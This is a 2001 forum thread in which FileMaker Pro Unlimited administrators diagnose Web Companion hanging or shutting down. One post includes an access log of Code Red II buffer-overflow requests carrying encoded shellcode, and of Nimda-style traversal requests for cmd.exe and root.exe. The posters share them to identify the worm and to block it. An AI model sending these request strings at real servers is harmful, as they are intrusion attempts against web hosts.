Unlimited Stops Serving?

[mprime]

Ok this is just weird. I have Unlimited serving a database and it started to just simply stop serving. Its up 24/7 or at least it should be but now after a while with no warning no indication you just simply cant see it online any more?

It just stops serving. Its still conntected to the FM Server and I can go use it like there is nothing wrong I can access it through TCP/IP filesharing and get online the machine is running fine but Unlimited has to be restarted and then you can see it again? Then after a peroid of time it no longer serves again?

Unlimited is the only thing running on it at all times? What the heck is up? Im out of ideas

[mprime]

yes Im on a mac OS 9 with 244 mg of ram only Unlimited is running on its own.

You say possible DB corruption s in its corrupting it or its already corrupted and its causing FMUL to stop.

[Tyfud]

Check wtih a new database being hosted, see if you get the same issue. You will need to stop serving the other files. Is tehre another computer you coudl try this on possibly? If not, then try creating an extention profile that is base extentions + networking and then serve that.

[Vaughan]

FM Server has an option to log-out idle connections. Is this causing it?

[Tyfud]

Are you on a Mac? Are you useing WSC? what is your Web server engine?

It has been an issue on some computers, FMI isn't sure what causes this, possible DB corruption.

[dwal]

If you are referring to web serving and not fileserving then check the access log to see if Web Companion is being hit by code red. On my server it has been causing what appears to be buffer overflow and the web serving simply stops but filesharing continues to function. Reloading Filemaker fixes it for many hours then it stops again. I contacted Filemaker about this a few weeks ago and they said they are working on it but cannot estimate when they will have a fix.

[mprime]

No server is not booting it off. I will check my logs to see if there are any code red type problems. Is the code red strain simply overflowing the server with requests cause I thought it didnt effect mac systems.

[mprime]

Uh ys I am refering to web serving (web companion) not filesharing

[mprime]

Man I just checked my access log and this is what has hapened about 15 minutes after I resatrt the server.

195.2.76.140 - - [24/Sep/2001:08:12:24 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 1362

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1388

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1368

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1372

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

64.36.63.180 - - [24/Sep/2001:08:27:29 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

64.36.63.180 - - [24/Sep/2001:08:27:30 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1450

64.36.63.180 - - [24/Sep/2001:08:27:30 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1512

64.36.63.180 - - [24/Sep/2001:08:27:30 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

64.36.63.180 - - [24/Sep/2001:08:27:31 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1424

64.36.63.180 - - [24/Sep/2001:08:27:31 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1434

64.36.63.180 - - [24/Sep/2001:08:27:31 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1434

64.36.63.180 - - [24/Sep/2001:08:27:31 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

64.36.63.180 - - [24/Sep/2001:08:27:31 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

64.36.63.180 - - [24/Sep/2001:08:27:32 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

64.36.63.180 - - [24/Sep/2001:08:27:32 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1416

64.36.37.175 - - [24/Sep/2001:08:28:01 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 1362

Once this takes place I the web companion shuts down. any one know what that looks like.

Its always from a similiar ip prefixes 64.36.XXX.XXX and 195.2.XXX.XXX

Help!

[mprime]

Ok I just did some research on this. What I posted above is a Code Red II attack plain and simple. They are from infected servers those attacks are not infecting my system but are shutting the webcompanion down like a DOS attack.

If any one has any thoughts on how to stop this from happining please let em know.

[mlindal]

we are having the same problem of unlimited stopping serving web pages. (running on a mac G3)

The Log shows no code red attack - but the NT server has had attempts. They put the patch on the NT server to stop buffer overflow.

Could an attack on the NT server (where the databases are) - or this new patch to stop buffer overflow be the cause?

Does the log file store all attempts at accessing web companion?

[CyberSport]

Hi. I just checked my access log, and I'm getting the same problems, starting 9/18. It hasn't caused my server to shut down yet, though.

So, yes, I am mad about this affecting macs b/c we have all been told it's only an NT problem.

Hmm. I'm contacting our university IT people but since they refuse to support FMP, if I mention it in any question, that's the end of their helpfulness!

[dwal]

I did the same with our firewall by having it block IPs and ranges of IPs of infected servers. This was OK until one of our users called to tell me he was not able to get to our web site because I had blocked the range he belongs to. There are probably others with the same problem. Also the number of new IPs needed to be added to the firewall has grown so rapidly I have not been able to keep up adding them to the firewall. Eventually if I continue at this rate I will block enough IPs to make it pointless to web serve. Thus I changed from using Norton Firewall to IPNetSentry. IPNS can recognize incoming 'code red' and 'nimda packets' and block them but it can only do this for a maximum of 100 IPs. Does anyone know of a firewall for mac able to do better than this? I need to block a much more than 100 IPs.

I talked with FileMaker six weeks ago about this problem and they said no one else has the problem but since then I have seen three others report it. They assured me they are working on it but could not give an estimate as to whem it will be fixed. I suspect it will be fixed with the release of FMP Unlimited 5.5. I hope it is very soon!

[mprime]

Just wanted to post an update I reconfigured my routers firewall and I dont have the problem any more. Once I read that the code red 2 sticks in an IP "neighborhood" when trying to make attemps I blocked those IP ranges and I also restricted WAN request even more than what I had and that seems to have fixed it.

I also think that whats interesting is the fact that it doesnt inffect Mac systems but the FMP software is affected by it in such a way that it rendered web companion useless.

Also code red 2 attacks certain cisco routers and the routers treat it like a DOS attack and they shut down.

Is FMkr looking into fixing this?

[ September 24, 2001: Message edited by: mprime ]

[mprime]

Yes I started to realize that so I have been trying various things to see what works best and here

[dwal]

This is a message for mprime; is the use of a router still working well to keep your server running? I may do the same but since I do not have a spare router available I will need to borrow one from another location and if it works then I will purchase one. Also is your connection to the web via DSL?

[iain]

mprime - we've just tested this again - am certain the problem is that the webcompanion cannot handle multiple requests when the results page (i.e html page post the query) exceeds 40KB - we have a number of databases hosted and the ones that return multiple results (generally over about 15 records displaying on a single results page) hang every time you fire multiple requests - however if the results page is less than 40KB you can fire requests till your hearts content - i have no doubt that scripts are a factor - indeed we have run into problems - however i can replicate this hanging everytime - there must be a problem with the webcompanion!!!!!

to test this go to a results page - in IE if you go to the properties on th page you can see the file size - experiment with the number of records returned - i.e. -max=10 etc - i guarentee if the results page is over 40KB it will hang fmp

anyone got any views/ideas?

[mprime]

HMM Thats interesting. I will look into that, the other interesting thing that started to happen this week is I'm getting a different form of request it looks like the code red 2 requests but its a little different matbe something new. However instead of WComp just stoping and serving Filemaker itself quits. I can go over to the station in the morning and Filemaker has completley quit out and just the finder is running I can then re open Filemaker and everything is fine till the next morning.

[Anatoli]

RE "i guarentee if the results page is over 40KB it will hang fmp"

Absolute nonsense this 40K limit. I am serving page with size of 66K -- full text field and some other stuff -- for 10 minutes without crash.

And once we served for test pages well over 300k with 200 replies.

[Mick Partis]

I too have a database being served up by web companion from FMPro Unlimited 5.0 which will sometimes return the error "Database not open" and which requires the Unlimited program to be closed and then re-started to clear the problem. The database is running with several others on FMPro server 5.0. and the "database not open" error applies to (usually) only one of the databases at the time.

I can serve up a 1Mb result page without breaking the search. In fact I find it impossible to cause the error myself - which makes it hard to fix! I'm always responding to users who report the error message...

NT error logs show no problems with FMPro server. When I look on the server the database is still open in Unlimited, it just isn't publishing through the Web companion, although the other open databases are.

The FMPro Unlimited error logs show this pattern when the problem occurs:

[05/Dec/2001:15:23:44 +0000] HTTP session disconnected.

[05/Dec/2001:19:38:51 +0000] HTTP session disconnected.

[06/Dec/2001:18:21:00 +0000] HTTP session disconnected.

The database is online at http://www.inforurale.org.uk

Any thoughts?

[Steven H. Blackwell]

You are probably the victim of multiple port scans by a virus of the type Code Red or Nimda. That can cause the WC to go deaf after a period of time due to gross overlaod.

THe new FMP 5.5v2 updater addresses a great deal of this.

HTH

Old Advance man

[Garry Claridge]

The problem with the Mac servers going down maybe for a different reason. The most likely being attempted access be somebody using either a Netscape 6.2 browser or an Opera browser.

They crash my Web Companion (5.5).

Garry

[sedlakd]

I ran into the same problem on NT 4 running on port 591 and my website on port 80. It appears to happen whenever someone uses Netscape 6, Mozilla, or when Google searches my site for updates. I removed 5.5 and reinstalled version 5.0 and all has been well for over a week. I have contacted Filemaker multiple times and get non-answers and non-responses. I already have the patches for Code Red. I have tried every permutation and reinstalling a clean database, etc.

[Will]

Under FM 5.5 did you try installing the latest updaters (FM and web companion) before going back to using FM5?